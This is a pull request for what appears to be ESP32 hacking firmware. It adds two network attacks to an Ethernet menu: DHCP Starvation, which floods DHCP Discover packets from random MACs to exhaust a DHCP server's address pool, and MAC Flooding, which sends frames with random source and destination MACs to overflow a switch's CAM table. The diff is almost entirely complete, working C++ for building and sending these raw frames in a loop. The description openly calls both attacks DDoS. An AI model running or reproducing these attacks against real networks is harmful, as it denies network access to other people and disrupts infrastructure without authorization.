### PR TITLE
Add some network attack to ethernet

### DIFF
--- a/src/core/menu_items/EthernetMenu.cpp
+++ b/src/core/menu_items/EthernetMenu.cpp
@@ -5,12 +5,14 @@
 #include "core/settings.h"
 #include "core/utils.h"
 #include "modules/ethernet/ARPScanner.h"
+#include "modules/ethernet/DHCPStarvation.h"
 #include "modules/ethernet/EthernetHelper.h"
 
 void EthernetMenu::optionsMenu() {
     options = {
-        {"Scan Hosts", [=]() {
-             auto eth = EthernetHelper();
+        {"Scan Hosts",
+         [=]() {
+             EthernetHelper eth = EthernetHelper();
 
              while (!eth.is_connected()) { delay(100); }
 
@@ -21,6 +23,14 @@ void EthernetMenu::optionsMenu() {
              }
              ARPScanner{esp_netinterface};
              eth.stop();
+         }},
+        {"DHCP Starvation",
+         [=]() {
+             EthernetHelper eth = EthernetHelper();
+
+             while (!eth.is_connected()) { delay(100); }
+
+             DHCPStarvation();
          }},
     };
     addOptionToMainMenu();

--- a/src/core/menu_items/EthernetMenu.cpp
+++ b/src/core/menu_items/EthernetMenu.cpp
@@ -8,30 +8,25 @@
 #include "modules/ethernet/DHCPStarvation.h"
 #include "modules/ethernet/EthernetHelper.h"
 
+void EthernetMenu::start_ethernet() {
+    eth = new EthernetHelper();
+    while (!eth->is_connected()) { delay(100); }
+}
+
 void EthernetMenu::optionsMenu() {
     options = {
         {"Scan Hosts",
          [=]() {
-             EthernetHelper eth = EthernetHelper();
-
-             while (!eth.is_connected()) { delay(100); }
-
-             esp_netif_t *esp_netinterface = esp_netif_get_handle_from_ifkey("ETH_SPI_0");
-             if (esp_netinterface == nullptr) {
-                 Serial.println("Failed to get netif handle");
-                 return;
-             }
-             ARPScanner{esp_netinterface};
-             eth.stop();
+             start_ethernet();
+             run_arp_scanner();
+             eth->stop();
          }},
         {"DHCP Starvation",
          [=]() {
-             EthernetHelper eth = EthernetHelper();
-
-             while (!eth.is_connected()) { delay(100); }
-
+             start_ethernet();
              DHCPStarvation();
-         }},
+             eth->stop();
+         }}
     };
     addOptionToMainMenu();
 

--- a/src/core/menu_items/EthernetMenu.cpp
+++ b/src/core/menu_items/EthernetMenu.cpp
@@ -7,6 +7,7 @@
 #include "modules/ethernet/ARPScanner.h"
 #include "modules/ethernet/DHCPStarvation.h"
 #include "modules/ethernet/EthernetHelper.h"
+#include "modules/ethernet/MACFlooding.h"
 
 void EthernetMenu::start_ethernet() {
     eth = new EthernetHelper();
@@ -25,6 +26,12 @@ void EthernetMenu::optionsMenu() {
          [=]() {
              start_ethernet();
              DHCPStarvation();
+             eth->stop();
+         }},
+        {"MAC Flooding",
+         [=]() {
+             start_ethernet();
+             MACFlooding();
              eth->stop();
          }}
     };

--- a/src/core/menu_items/EthernetMenu.h
+++ b/src/core/menu_items/EthernetMenu.h
@@ -3,9 +3,14 @@
 #ifndef __Ethernet_MENU_H__
 #define __Ethernet_MENU_H__
 
+#include "modules/ethernet/EthernetHelper.h"
 #include <MenuItemInterface.h>
 #if !defined(LITE_VERSION)
 class EthernetMenu : public MenuItemInterface {
+private:
+    EthernetHelper *eth;
+    void start_ethernet();
+
 public:
     EthernetMenu() : MenuItemInterface("Ethernet") {}
 

--- a/src/modules/ethernet/ARPScanner.cpp
+++ b/src/modules/ethernet/ARPScanner.cpp
@@ -20,6 +20,15 @@
 #include <globals.h>
 #include <sstream>
 
+void run_arp_scanner() {
+    esp_netif_t *esp_netinterface = esp_netif_get_handle_from_ifkey("ETH_SPI_0");
+    if (esp_netinterface == nullptr) {
+        Serial.println("Failed to get netif handle");
+        return;
+    }
+    ARPScanner{esp_netinterface};
+}
+
 ARPScanner::ARPScanner(esp_netif_t *_esp_net_interface) {
     esp_net_interface = _esp_net_interface;
     setup();

--- a/src/modules/ethernet/ARPScanner.h
+++ b/src/modules/ethernet/ARPScanner.h
@@ -28,4 +28,5 @@ public:
     ~ARPScanner();
 };
 
+void run_arp_scanner();
 #endif // ARP_SCANNER_H

--- a/src/modules/ethernet/DHCPStarvation.cpp
+++ b/src/modules/ethernet/DHCPStarvation.cpp
@@ -1,0 +1,198 @@
+/**
+ * @file DHCPStarvation.cpp
+ * @author Andrea Canale (https://github.com/andreock)
+ * @brief Implementation of an ethernet DHCP Starvation attack
+ * @note Sending logic backported from ARP attacks
+ * @version 0.1
+ * @date 2025-07-07
+ */
+
+#include "DHCPStarvation.h"
+#include "Arduino.h"
+#include "core/display.h"
+#include "core/mykeyboard.h"
+#include "core/net_utils.h"
+#include "core/utils.h"
+#include "core/wifi/wifi_common.h"
+#include "lwip/pbuf.h"
+#include "lwipopts.h"
+#include <globals.h>
+#include <iomanip>
+#include <iostream>
+#include <lwip/dns.h>
+#include <lwip/err.h>
+#include <lwip/etharp.h>
+#include <lwip/igmp.h>
+#include <lwip/inet.h>
+#include <lwip/init.h>
+#include <lwip/ip_addr.h>
+#include <lwip/mem.h>
+#include <lwip/memp.h>
+#include <lwip/netif.h>
+#include <lwip/sockets.h>
+#include <lwip/sys.h>
+#include <lwip/timeouts.h>
+
+DHCPStarvation::DHCPStarvation() {
+    setup();
+    show_gui();
+    loop();
+}
+
+DHCPStarvation::~DHCPStarvation() { pbuf_free(p); }
+
+void DHCPStarvation::show_gui() {
+    drawMainBorderWithTitle("DHCP Starvation");
+
+    displayTextLine("Press prev to stop");
+}
+
+void DHCPStarvation::loop() {
+    while (true) {
+        send_DHCP_packet();
+        if (PrevPress) {
+#if !defined(HAS_KEYBOARD) && !defined(HAS_ENCODER)
+            LongPress = true;
+            long _tmp = millis();
+            while (PrevPress) {
+                if (millis() - _tmp > 150)
+                    tft.drawArc(
+                        tftWidth / 2,
+                        tftHeight / 2,
+                        25,
+                        15,
+                        0,
+                        360 * (millis() - _tmp) / 700,
+                        getColorVariation(bruceConfig.priColor),
+                        bruceConfig.bgColor
+                    );
+                vTaskDelay(10 / portTICK_RATE_MS);
+            }
+            LongPress = false;
+            if (millis() - _tmp > 700) { // longpress detected to exit
+                returnToMenu = true;
+                break;
+            }
+#endif
+            check(PrevPress);
+        }
+    }
+}
+
+void DHCPStarvation::prepare_ethernet_hdr() {
+    // DHCP discover is sent to broadcast
+    memcpy(ethernet_frame, broadcast_mac_address, MAC_ADDRESS_LENGTH * sizeof(uint8_t));
+
+    // Source will be added to the frame in the send_DHCP_packet method
+
+    // Packet type(IPV4 0x0800)
+    ethernet_frame[12] = ETHERNET_PROTOCOL_IPV4 / 256;
+    ethernet_frame[13] = ETHERNET_PROTOCOL_IPV4 % 256;
+}
+
+// Fill UDP and IPV4 header structure
+void DHCPStarvation::prepare_udp_ipv4_hdr() {
+    udp_payload.src = htons(68);
+    udp_payload.dest = htons(67);
+    udp_payload.len = htons(252);
+
+    ipv4_pkt._v_hl = 0x45; // IPV4-Jeader len: 5 bytes
+    ipv4_pkt._tos = 0x10;
+    ipv4_pkt._len = htons(272); // 272, total len
+    ipv4_pkt._id = 0x0;
+    ipv4_pkt._offset = 0x0;
+    ipv4_pkt._ttl = 0x10;   // TTL: 16
+    ipv4_pkt._proto = 0x11; // Protocol: 17(UDP)
+
+    memcpy(&ipv4_pkt.dest.addr, broadcast_mac_address, 4);
+
+    uint8_t src_ip[4] = {0, 0, 0, 0};
+    memcpy(&ipv4_pkt.src.addr, src_ip, 4);
+
+    // Checksum never change since it's calculated only on the IPV4 header.
+    ipv4_pkt._chksum = 0xcea9;
+
+    // Copy IPV4 header to ethernet frame
+    memcpy(ethernet_frame + ETH_HDRLEN, &ipv4_pkt, 20 * sizeof(uint8_t));
+}
+
+// Fill DHCP header structure
+void DHCPStarvation::prepare_dhcp_hdr() {
+    dhcp_payload.op = 0x01;    // Boot request
+    dhcp_payload.htype = 0x01; // Ethernet
+    dhcp_payload.hlen = 0x06;  // MAC address len
+    dhcp_payload.hops = 0x00;
+    dhcp_payload.xid = random();
+    dhcp_payload.secs = 0x0000;
+    dhcp_payload.flags = htons(0x8000); // Broadcast flag
+
+    // Here to save time avoiding memset, use directly uint32_t since the address is 0.0.0.0
+    dhcp_payload.ciaddr.addr = 0; // 0.0.0.0
+    dhcp_payload.yiaddr.addr = 0;
+    dhcp_payload.siaddr.addr = 0;
+    dhcp_payload.giaddr.addr = 0;
+
+    memset(&dhcp_payload.chaddr, 0, 16);
+
+    // Insert 192 bit of padding
+    memset(dhcp_payload.sname, 0, DHCP_SNAME_LEN);
+    memset(dhcp_payload.file, 0, DHCP_FILE_LEN);
+
+    dhcp_payload.cookie = htonl(0x63825363); // Identify DHCP packet
+
+    dhcp_payload.options[0] = 0x35; // Option 53
+    dhcp_payload.options[1] = 0x01;
+    dhcp_payload.options[2] = 0x01;
+}
+
+// Surgically change ethernet frame to include new mac address
+void DHCPStarvation::change_mac_in_packet() {
+    // Change MAC in ethernet frame
+    memcpy(ethernet_frame + MAC_ADDRESS_LENGTH, mac, MAC_ADDRESS_LENGTH * sizeof(uint8_t));
+
+    // Change MAC in DHCP header
+    memcpy(ethernet_frame + 70, mac, MAC_ADDRESS_LENGTH);
+}
+
+void DHCPStarvation::randomize_mac() {
+    for (int i = 0; i < 6; i++) { mac[i] = random() % 256; }
+}
+
+void DHCPStarvation::setup() {
+    netif = netif_list;
+    if (netif == NULL) {
+        displayError("No interface found");
+        Serial.println("No interface found");
+        return;
+    }
+
+    p = pbuf_alloc(PBUF_RAW, PACKET_LENGTH, PBUF_RAM);
+    if (p == NULL) {
+        displayError("Failed to allocate pbuf");
+        Serial.println("Failed to allocate pbuf");
+        return;
+    }
+
+    ethernet_frame = (uint8_t *)p->payload;
+    prepare_ethernet_hdr();
+    prepare_udp_ipv4_hdr();
+    prepare_dhcp_hdr();
+
+    //  UDP Header
+    memcpy(ethernet_frame + ETH_HDRLEN + IP_HLEN, &udp_payload, DHCP_HDRLEN + UDP_HLEN);
+
+    // Fill payload
+    memcpy(ethernet_frame + ETH_HDRLEN + IP_HLEN + UDP_HLEN, &dhcp_payload, UDP_HLEN);
+
+    ethernet_frame[285] = 0xff; // Close the packet
+}
+
+void DHCPStarvation::send_DHCP_packet() {
+
+    uint8_t *ethernet_frame = (uint8_t *)p->payload;
+    randomize_mac();
+    change_mac_in_packet();
+
+    // Send packet
+    netif->linkoutput(netif, p);
+}

--- a/src/modules/ethernet/DHCPStarvation.h
+++ b/src/modules/ethernet/DHCPStarvation.h
@@ -1,0 +1,49 @@
+#ifndef DHCP_STARVATION_H
+#define DHCP_STARVATION_H
+
+#include "Arduino.h"
+#include "lwip/prot/dhcp.h"
+#include "lwip/prot/ip4.h"
+#include "lwip/udp.h"
+
+class DHCPStarvation {
+private:
+#define ETH_HDRLEN 14   // Ethernet header length
+#define IPV4_HDRLEN 20  // IPV4 header length
+#define UDP_HDRLEN 8    // UDP header length
+#define DHCP_HDRLEN 244 // DHCP packet length
+
+#define MAC_ADDRESS_LENGTH 6
+#define IPV4_LENGTH 4
+#define ETHERNET_PROTOCOL_IPV4 0x0800
+#define PACKET_LENGTH 286 // ETH header + IPV4 header + UDP header + DHCP header
+    ip_hdr ipv4_pkt;
+    udp_hdr udp_payload;
+    dhcp_msg dhcp_payload;
+    byte mac[6];
+    uint8_t broadcast_mac_address[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
+    void send_DHCP_packet();
+    void show_gui();
+    struct pbuf *p;
+    struct netif *netif;
+    uint8_t *ethernet_frame;
+    void prepare_ethernet_hdr();
+
+    // Fill UDP and IPV4 header structure
+    void prepare_udp_ipv4_hdr();
+
+    // Fill DHCP header structure
+    void prepare_dhcp_hdr();
+    // Surgically change ethernet frame to include new mac address
+    void change_mac_in_packet();
+
+    void randomize_mac();
+
+public:
+    DHCPStarvation();
+    ~DHCPStarvation();
+    void setup();
+    void loop();
+};
+
+#endif

--- a/src/modules/ethernet/MACFlooding.cpp
+++ b/src/modules/ethernet/MACFlooding.cpp
@@ -1,0 +1,182 @@
+/**
+ * @file MACFlooding.cpp
+ * @author Andrea Canale (https://github.com/andreock)
+ * @brief Implementation of an ethernet MAC Flooding attack
+ * @note Sending logic backported from ARP attacks
+ * @note The packet structure comes from dsniff tool(https://www.monkey.org/~dugsong/dsniff/)
+ * @version 0.1
+ * @date 2025-07-15
+ */
+
+#include "MACFlooding.h"
+#include "Arduino.h"
+#include "core/display.h"
+#include "core/mykeyboard.h"
+#include "core/net_utils.h"
+#include "core/utils.h"
+#include "core/wifi/wifi_common.h"
+#include "lwip/pbuf.h"
+#include "lwipopts.h"
+#include <globals.h>
+#include <iomanip>
+#include <iostream>
+#include <lwip/dns.h>
+#include <lwip/err.h>
+#include <lwip/etharp.h>
+#include <lwip/igmp.h>
+#include <lwip/inet.h>
+#include <lwip/init.h>
+#include <lwip/ip_addr.h>
+#include <lwip/mem.h>
+#include <lwip/memp.h>
+#include <lwip/netif.h>
+#include <lwip/sockets.h>
+#include <lwip/sys.h>
+#include <lwip/timeouts.h>
+
+MACFlooding::MACFlooding() {
+    setup();
+    show_gui();
+    loop();
+}
+
+MACFlooding::~MACFlooding() { pbuf_free(p); }
+
+void MACFlooding::show_gui() {
+    drawMainBorderWithTitle("MAC Flooding");
+
+    displayTextLine("Press prev to stop");
+}
+
+void MACFlooding::loop() {
+    while (true) {
+        send_packet();
+        if (PrevPress) {
+#if !defined(HAS_KEYBOARD) && !defined(HAS_ENCODER)
+            LongPress = true;
+            long _tmp = millis();
+            while (PrevPress) {
+                if (millis() - _tmp > 150)
+                    tft.drawArc(
+                        tftWidth / 2,
+                        tftHeight / 2,
+                        25,
+                        15,
+                        0,
+                        360 * (millis() - _tmp) / 700,
+                        getColorVariation(bruceConfig.priColor),
+                        bruceConfig.bgColor
+                    );
+                vTaskDelay(10 / portTICK_RATE_MS);
+            }
+            LongPress = false;
+            if (millis() - _tmp > 700) { // longpress detected to exit
+                returnToMenu = true;
+                break;
+            }
+#endif
+            check(PrevPress);
+        }
+    }
+}
+
+uint16_t MACFlooding::calculate_ip_checksum() {
+    uint16_t *buf = (uint16_t *)&ipv4_pkt;
+    uint32_t sum = 0;
+    size_t len = sizeof(ip_hdr);
+
+    // Make 16 bit words out of every two adjacent 8 bit words and
+    // calculate the sum of all 16 bit words
+    while (len > 1) {
+        sum += *buf++;
+        len -= 2;
+    }
+
+    // Add left-over byte, if any
+    if (len == 1) { sum += *((uint8_t *)buf) << 8; }
+
+    // Fold 32-bit sum to 16 bits: add carrier to result
+    while (sum >> 16) { sum = (sum & 0xFFFF) + (sum >> 16); }
+
+    // One's complement
+    sum = ~sum;
+
+    return (uint16_t)sum;
+}
+
+void MACFlooding::prepare_packet_hdr() {
+    randomize_mac(eth_header.src.addr);
+    randomize_mac(eth_header.dest.addr);
+    eth_header.type = htons(0x0800); // Packet type IPV4
+
+    ipv4_pkt._v_hl = 0x45; // IPV4-Jeader len: 5 bytes
+    ipv4_pkt._tos = 0x10;
+    ipv4_pkt._len = htons(20);    // 20, total len
+    ipv4_pkt._id = random(65535); // Avoid overflow limiting random to u16
+    ipv4_pkt._offset = 0x0;
+    ipv4_pkt._ttl = htons(0x40); // TTL: 64
+    ipv4_pkt._proto = 0x11;      // Protocol: 17(UDP)
+
+    // memcpy(&ipv4_pkt.dest.addr, broadcast_mac_address, 4);
+
+    uint8_t src_ip[4] = {random(255), random(255), random(255), random(255)};
+    memcpy(&ipv4_pkt.src.addr, src_ip, 4);
+
+    uint8_t dst_ip[4] = {random(255), random(255), random(255), random(255)};
+    memcpy(&ipv4_pkt.dest.addr, dst_ip, 4);
+
+    ipv4_pkt._chksum = htons(calculate_ip_checksum()
+    ); // Since we change ip src and dst everytime, recalculate CRC of IP header
+}
+
+// Surgically change ethernet frame to include new mac address
+void MACFlooding::change_mac_in_packet() {
+    // Change source and destination MAC address to fill switch CAM table(src MAC addr) and generate a
+    // broadcast storm(packet will be sent in broadcast)
+    byte mac[6];
+
+    randomize_mac(mac);
+    memcpy(ethernet_frame, mac, MAC_ADDRESS_LENGTH * sizeof(uint8_t));
+
+    randomize_mac(mac);
+    memcpy(ethernet_frame + MAC_ADDRESS_LENGTH, mac, MAC_ADDRESS_LENGTH * sizeof(uint8_t));
+}
+
+void MACFlooding::randomize_mac(uint8_t *mac) {
+    for (int i = 0; i < 6; i++) { mac[i] = random() % 256; }
+}
+
+void MACFlooding::setup() {
+    randomSeed(millis());
+    netif = netif_list;
+    if (netif == NULL) {
+        displayError("No interface found");
+        Serial.println("No interface found");
+        return;
+    }
+
+    p = pbuf_alloc(PBUF_RAW, PACKET_LENGTH, PBUF_RAM);
+    if (p == NULL) {
+        displayError("Failed to allocate pbuf");
+        Serial.println("Failed to allocate pbuf");
+        return;
+    }
+
+    ethernet_frame = (uint8_t *)p->payload;
+
+    prepare_packet_hdr();
+
+    for (size_t i = 34; i < 54; i++) { ethernet_frame[i] = random(255); }
+
+    memcpy(ethernet_frame, &eth_header, SIZEOF_ETH_HDR);
+    memcpy(ethernet_frame + SIZEOF_ETH_HDR, &ipv4_pkt, IP_HLEN);
+}
+
+void MACFlooding::send_packet() {
+
+    uint8_t *ethernet_frame = (uint8_t *)p->payload;
+    change_mac_in_packet();
+
+    // Send packet
+    netif->linkoutput(netif, p);
+}

--- a/src/modules/ethernet/MACFlooding.h
+++ b/src/modules/ethernet/MACFlooding.h
@@ -1,0 +1,45 @@
+#ifndef MAC_FLOODING_H
+#define MAC_FLOODING_H
+
+#include "Arduino.h"
+#include "lwip/prot/dhcp.h"
+#include "lwip/prot/ethernet.h"
+#include "lwip/prot/ip4.h"
+#include "lwip/udp.h"
+
+class MACFlooding {
+private:
+#define ETH_HDRLEN 14  // Ethernet header length
+#define IPV4_HDRLEN 20 // IPV4 header length
+#define UDP_HDRLEN 8   // UDP header length
+
+#define MAC_ADDRESS_LENGTH 6
+#define IPV4_LENGTH 4
+#define ETHERNET_PROTOCOL_IPV4 0x0800
+#define PACKET_LENGTH 54 // ETH header + IPV4 header + some random data
+
+    ip_hdr ipv4_pkt;
+    eth_hdr eth_header;
+    void send_packet();
+    void show_gui();
+    struct pbuf *p;
+    struct netif *netif;
+    uint8_t *ethernet_frame;
+    void prepare_packet_hdr();
+
+    // Surgically change ethernet frame to include new mac address
+    void change_mac_in_packet();
+
+    void randomize_mac(uint8_t *mac);
+
+    // Calculate checksum for ip header
+    uint16_t calculate_ip_checksum();
+
+public:
+    MACFlooding();
+    ~MACFlooding();
+    void setup();
+    void loop();
+};
+
+#endif


### PR DESCRIPTION
This PR adds 2 new attacks to the ethernet section:

- DHCP Starvation that DDoS a DHCP server making impossible to new device to get an IP address
- MAC Flooding that DDoS a network switch by filling the CAM table with fake MAC address in order to slow down the network and make switch broadcast all the packets.

Other attacks listed in #1443 will be available in future since require more work than DHCP Starvation and MAC Flooding.